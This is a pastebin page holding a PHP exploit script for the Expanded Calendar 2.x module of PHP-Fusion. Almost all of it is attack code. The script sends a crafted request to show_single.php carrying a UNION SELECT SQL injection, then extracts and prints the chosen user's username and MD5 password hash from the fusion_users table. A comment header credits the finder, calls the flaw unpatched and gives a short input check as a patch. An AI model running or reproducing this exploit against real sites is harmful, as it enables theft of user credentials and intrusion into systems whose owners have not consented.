NoPaste Service
DOWNLOAD
Language: Actionscript
Author: Matrix86
Description: Calendar-V2.00 Php-Fusion mod
Date: 22/09/08 10:39
  1. <?php
  2. print_r("
  3. /********************************************************
  4. *      Expanded Calendar 2.x (PHP-Fusion module)        *
  5. *      User pass disclosure exploit                     *
  6. *      Found by Matrix86 of Rbt-4 Crew                  *
  7. *      Site: www.rbt-4.net                              *
  8. *      Mail: info[at]rbt-4[dot]net                      *
  9. *********************************************************
  10. * Bug found in                                          *
  11. *      /infusions/calendar_events_panel/show_single.php *
  12. * Line:                                                 *
  13. *      27                                               *
  14. * Vulnerability type: Sql injection                     *
  15. * Unpatched!                                            *
  16. * Patch:                                                *
  17. * Line 26:                                              *
  18. * if(!isset(\$sel)||!isNum(\$sel)) fallback(\"index.php\"); *
  19. ********************************************************/
  20. ");
  21.  
  22. if($argc < 4) die("Usage: ".$argv[0]." [site] [path] [user_id]\nExample: ".$argv[0]." localhost /php-fusion/ 1\n");
  23.  
  24. ini_set("max_execution_time",0);
  25. ini_set("default_socket_timeout",4);
  26.  
  27. $host    = $argv[1];
  28. $path    = $argv[2];
  29. $user_id = $argv[3];
  30. $port    = 80;
  31.  
  32. $sqlinit = "infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=";
  33. $sqlend = "/*";
  34.  
  35. function send($req){
  36.         global $host,$port;
  37.        
  38.         $ip = gethostbyname($host);
  39.         if(stristr($host,$ip)) die("Error: Host not found\n");
  40.        
  41.         if(!($sock = fsockopen($ip,$port))) die("Error: unable open sock!\n");
  42.        
  43.         fputs($sock,$req);
  44.         $response = "";
  45.         while (!feof($sock)) {
  46.                 $response .= fgets ($sock,128);
  47.         }
  48.         fclose ($sock);
  49.         return $response;
  50. }
  51.  
  52. $packet = "GET ".$path.$sqlinit.$user_id.$sqlend." HTTP/1.0\r\n";
  53. $packet.= "User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko)\r\n";
  54. $packet.= "Host: ".$host."\r\n";
  55. $packet.="Connection: Close\r\n\r\n";
  56. echo "Packet:\n".$packet."\n\n";
  57.  
  58. $resp = send($packet);
  59. $temp  = explode("<td colspan='2'><font size='4'><u>",$resp);
  60. $temp2 = explode("<td colspan='3' style='border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px'><font style='font-size: 11px'>",$temp[1]);
  61. $temp3 = explode("</td>",$temp2[1]);
  62. $username = $temp3[0];
  63.  
  64. if(isset($temp[1])) {
  65.         $md5 = substr($temp[1],0,32);
  66.         echo "Id user:  ".$user_id."\nUsername: ".$username."\nPassword: ".$md5."\n";
  67. }
  68. else echo("Bug Fixed..sorry!\n");
  69.  
  70. exit();
  71. ?>